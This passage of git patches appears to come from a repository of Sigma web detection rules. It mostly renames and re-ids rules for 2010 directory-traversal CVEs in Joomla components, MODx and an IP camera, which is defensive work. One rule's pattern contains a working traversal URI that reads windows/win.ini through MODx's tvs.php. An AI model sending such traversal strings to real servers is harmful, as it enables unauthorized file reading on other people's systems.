b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion -id: a991b845-3035-492c-914d-0cb7b0e7bd10 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-3426 exploitation attempt +id: 06621f7e-2987-4625-8c42-d66951a9da9d +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml similarity index 81% rename from rules/web/web_cve_CVE-2010-4231.yaml rename to rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml index dbe3d725..5e4062f3 100644 --- a/rules/web/web_cve_CVE-2010-4231.yaml +++ b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal -id: 8c7f0cbc-c7cd-4bb5-87ef-9e2ff125b7d8 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-4231 exploitation attempt +id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-4617.yaml rename to rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml index f31d5418..080cc881 100644 --- a/rules/web/web_cve_CVE-2010-4617.yaml +++ b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion -id: 35c29803-4068-4a64-a007-d2b6984f8c58 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-4617 exploitation attempt +id: ed14d2cb-8716-4ab1-a819-36d173e617ab +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JotLoader (com_jotloader) component diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml similarity index 85% rename from rules/web/web_cve_CVE-2010-5278.yaml rename to rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml index fd292926..cf20ed0e 100644 --- a/rules/web/web_cve_CVE-2010-5278.yaml +++ b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-5278:MODx manager - Local File Inclusion -id: 5e042bf8-67ea-4455-8b75-07c57d7ccdad -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-5278 exploitation attempt +id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php From 3f27295e64b91e7aed6eff5ccf2a5c0c3b52573b Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 21:47:33 +0530 Subject: [PATCH 0582/1367] Stupid Author field --- rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml | 4 ++-- rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml | 4 ++-- 32 files changed, 64 insertions(+), 64 deletions(-) diff --git a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml index d6be923a..a6ec1f7d 100644 --- a/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-0943 exploitation attempt -id: 63b70c55-0d7a-4e2f-a130-11028352b6ff -Author: Subhash Popuri (@pbssubhash) +id: fa7e28e3-d286-4c38-b6df-41eb004b66ba +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) diff --git a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml index c38d952b..f96cb67b 100644 --- a/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-0944 exploitation attempt -id: d30903f7-cb51-445f-81a1-f2948f5fb763 -Author: Subhash Popuri (@pbssubhash) +id: c656c178-4f5a-4dc4-a605-21e225987ac5 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JCollection (com_jcollection) diff --git a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml index 70431ad7..8cead1aa 100644 --- a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1306 exploitation attempt -id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801 -Author: Subhash Popuri (@pbssubhash) +id: b2105629-bb00-47a1-a01e-24147433710c +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component diff --git a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml index 7faa239f..6e4902b2 100644 --- a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1314 exploitation attempt -id: 24c87e4f-7206-451a-9164-364ca4f3c388 -Author: Subhash Popuri (@pbssubhash) +id: 532cef3e-f3cc-437d-b6da-146675cb61ac +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) diff --git a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml index 25b32926..1286b44e 100644 --- a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1345 exploitation attempt -id: 5f723f65-f584-49f3-87c0-7babbae20d9d -Author: Subhash Popuri (@pbssubhash) +id: 8869cdca-39da-496a-ba9c-c9eeb5c51a4c +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) diff --git a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml index 1ba62bda..206da49b 100644 --- a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1353 exploitation attempt -id: 26d15692-1cfc-4427-8e7d-9a364c2628f3 -Author: Subhash Popuri (@pbssubhash) +id: e464164c-0cb6-427f-9eea-06dbf29d3044 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) diff --git a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml index 21b6dc41..29e32c32 100644 --- a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1474 exploitation attempt -id: 5b50ffc4-dde4-4905-9da9-eb499ee53971 -Author: Subhash Popuri (@pbssubhash) +id: 4964f728-0184-4efb-b8b1-23087da5baab +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) diff --git a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml index 4786c685..50fbb166 100644 --- a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1475 exploitation attempt -id: 69295f5a-428a-47d6-bf4d-a93bb23270ca -Author: Subhash Popuri (@pbssubhash) +id: 5f4ba4e9-6b51-4284-afdf-15485b08088f +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) diff --git a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml index 9e3ef52a..3f165d2a 100644 --- a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1495 exploitation attempt -id: e21410ad-5016-457a-a48f-2da871951471 -Author: Subhash Popuri (@pbssubhash) +id: 24ffa234-2963-4518-b72d-7aae991d1189 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Matamko (com_matamko) component diff --git a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml index bb5f49b8..295628c1 100644 --- a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1532 exploitation attempt -id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b -Author: Subhash Popuri (@pbssubhash) +id: d65086e6-88a4-45e5-bc99-b1695aff4bd7 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) diff --git a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml index 31ae9336..17821b03 100644 --- a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1533 exploitation attempt -id: 2e547af2-0fb1-4d26-829e-fb42d959133c -Author: Subhash Popuri (@pbssubhash) +id: ad63c834-1072-4c2d-b246-f615557b3026 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the TweetLA (com_tweetla) component diff --git a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml index d2ee67cd..38236528 100644 --- a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1535 exploitation attempt -id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c -Author: Subhash Popuri (@pbssubhash) +id: b0962f54-4cfd-4059-b742-af6f4e82e8b2 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) diff --git a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml index 564faaf9..2c2df33e 100644 --- a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1602 exploitation attempt -id: d79bf48d-2705-4da1-929b-37e07764998f -Author: Subhash Popuri (@pbssubhash) +id: fdf12606-2a8a-4450-b3b7-e6bdf03e7096 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) diff --git a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml index 447bbe51..74080bca 100644 --- a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1657 exploitation attempt -id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020 -Author: Subhash Popuri (@pbssubhash) +id: 41364f89-94ca-464d-8ab4-0c1348656707 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the SmartSite (com_smartsite) component diff --git a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml index 148380f1..87d7b66a 100644 --- a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1718 exploitation attempt -id: a538251c-d600-43f3-8051-c3a83a5e8702 -Author: Subhash Popuri (@pbssubhash) +id: 14f01fca-dec5-4144-a40c-63488767b57f +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in archeryscores.php in the Archery diff --git a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml index 94179320..eff64809 100644 --- a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1722 exploitation attempt -id: 84715b18-505d-4252-9470-03c98a3006e5 -Author: Subhash Popuri (@pbssubhash) +id: d1b8ce75-b746-48a9-ad5c-4d692f5a21a0 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Online Market (com_market) component diff --git a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml index 9bd796a5..356a6f8a 100644 --- a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1875 exploitation attempt -id: af757e17-ad81-4a28-a551-49c17aa5113a -Author: Subhash Popuri (@pbssubhash) +id: 9fec2f12-8d56-4b94-8140-be92319e6282 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Real Estate Property (com_properties) diff --git a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml index 4f10cf4e..cdcf71d5 100644 --- a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1953 exploitation attempt -id: 0fc4af77-6974-4e50-bf5e-9f175304eb54 -Author: Subhash Popuri (@pbssubhash) +id: b83f9267-f61a-4a52-a39c-2244330665c8 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) diff --git a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml index 23ef2619..4430f4fb 100644 --- a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1954 exploitation attempt -id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80 -Author: Subhash Popuri (@pbssubhash) +id: e15b002d-bfad-4ae6-8253-5c5e1d3d7c61 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) diff --git a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml index 10d81d67..6204191c 100644 --- a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1955 exploitation attempt -id: 497c0911-226f-48a1-ac9f-518ffb98e65e -Author: Subhash Popuri (@pbssubhash) +id: e5ac823c-60fa-40c5-b7b2-965e023d3747 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) diff --git a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml index 80eb1897..ee9852f8 100644 --- a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1979 exploitation attempt -id: 5b1c3030-e17b-43b3-b95e-952355a0f43f -Author: Subhash Popuri (@pbssubhash) +id: 62b49fe0-8735-4c00-ac45-52ac7b673174 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) diff --git a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml index a29bfea4..2d32c405 100644 --- a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1983 exploitation attempt -id: c4f29c4f-0281-4518-a824-88f259d92ef5 -Author: Subhash Popuri (@pbssubhash) +id: 7325d138-af8e-42a1-80eb-a6b69c32da79 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) diff --git a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml index 20b4dc70..171ec24e 100644 --- a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2033 exploitation attempt -id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64 -Author: Subhash Popuri (@pbssubhash) +id: 2d38d9d5-b9a3-46dd-8f55-81c5961c21b2 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) diff --git a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml index f6c9adca..06d0b88e 100644 --- a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2036 exploitation attempt -id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e -Author: Subhash Popuri (@pbssubhash) +id: ae8ea246-0ec4-48ed-96b1-e6ad8a8a0274 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) diff --git a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml index 70cc525b..3609a834 100644 --- a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2259 exploitation attempt -id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4 -Author: Subhash Popuri (@pbssubhash) +id: a64bc24c-39fc-4531-b0c3-9d26f439f246 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component diff --git a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml index 32008b7c..600ebee3 100644 --- a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2307 exploitation attempt -id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9 -Author: Subhash Popuri (@pbssubhash) +id: 4d1124ea-beb9-4b9a-b75b-a76f61236a67 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Multiple directory traversal vulnerabilities in the web server for Motorola diff --git a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml index 01e0fedc..94fcbdbc 100644 --- a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2682 exploitation attempt -id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43 -Author: Subhash Popuri (@pbssubhash) +id: c190dd5f-7b3c-4184-bca0-94129a1a0cdb +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) diff --git a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml index 7dc8e6df..6513ed68 100644 --- a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-2861 exploitation attempt -id: 21032758-8761-4a18-8f66-bace612e2481 -Author: Subhash Popuri (@pbssubhash) +id: d98ff4e9-b11e-40b7-a536-b71bd1800042 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Multiple directory traversal vulnerabilities in the administrator console diff --git a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml index ad2dab17..8d50a3c8 100644 --- a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-3426 exploitation attempt -id: 06621f7e-2987-4625-8c42-d66951a9da9d -Author: Subhash Popuri (@pbssubhash) +id: 3178d248-aa37-4f7c-97ee-3c16809bca69 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) diff --git a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml index 5e4062f3..e8a4bb98 100644 --- a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-4231 exploitation attempt -id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b -Author: Subhash Popuri (@pbssubhash) +id: 52c315b8-c56e-41b9-ace4-fdfdc593657d +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. diff --git a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml index 080cc881..9384cf9d 100644 --- a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-4617 exploitation attempt -id: ed14d2cb-8716-4ab1-a819-36d173e617ab -Author: Subhash Popuri (@pbssubhash) +id: cc29de7e-88e9-4deb-ac0b-5072745ba6d5 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JotLoader (com_jotloader) component diff --git a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml index cf20ed0e..fb25c137 100644 --- a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml +++ b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml @@ -1,6 +1,6 @@ title: CVE-2010-5278 exploitation attempt -id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593 -Author: Subhash Popuri (@pbssubhash) +id: 55a72ccd-4f16-42a7-afc8-f7958035bf90 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php From 39daebffa4d5073a7ba3fc5ebdc0507ee75aa588 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 25 Aug 2021 20:02:38 +0200 Subject: [PATCH 0583/1367] Cleanup --- ...eb_cve_2010_5278_exploitation_attempt.yml} | 22 +++++++++---------- 1 file changed, 10 insertions(+), 12 deletions(-) rename rules/web/{web_cve_CVE-2010-5278_exploitation_attempt.yaml => web_cve_2010_5278_exploitation_attempt.yml} (52%) diff --git a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml similarity index 52% rename from rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml rename to rules/web/web_cve_2010_5278_exploitation_attempt.yml index fb25c137..49100bc5 100644 --- a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml +++ b/rules/web/web_cve_2010_5278_exploitation_attempt.yml @@ -1,26 +1,24 @@ -title: CVE-2010-5278 exploitation attempt +title: CVE-2010-5278 Exploitation Attempt id: 55a72ccd-4f16-42a7-afc8-f7958035bf90 author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 +date: 2021/08/25 status: experimental description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. references: -- https://www.exploit-db.com/exploits/34788 -- https://www.cvedetails.com/cve/CVE-2010-5278 -- https://github.com/projectdiscovery/nuclei-templates + - https://www.exploit-db.com/exploits/34788 + - https://www.cvedetails.com/cve/CVE-2010-5278 + - https://github.com/projectdiscovery/nuclei-templates detection: selection: - c-uri|contains: - - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 + c-uri|contains: '/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00' condition: selection false_positives: -- Scanning from 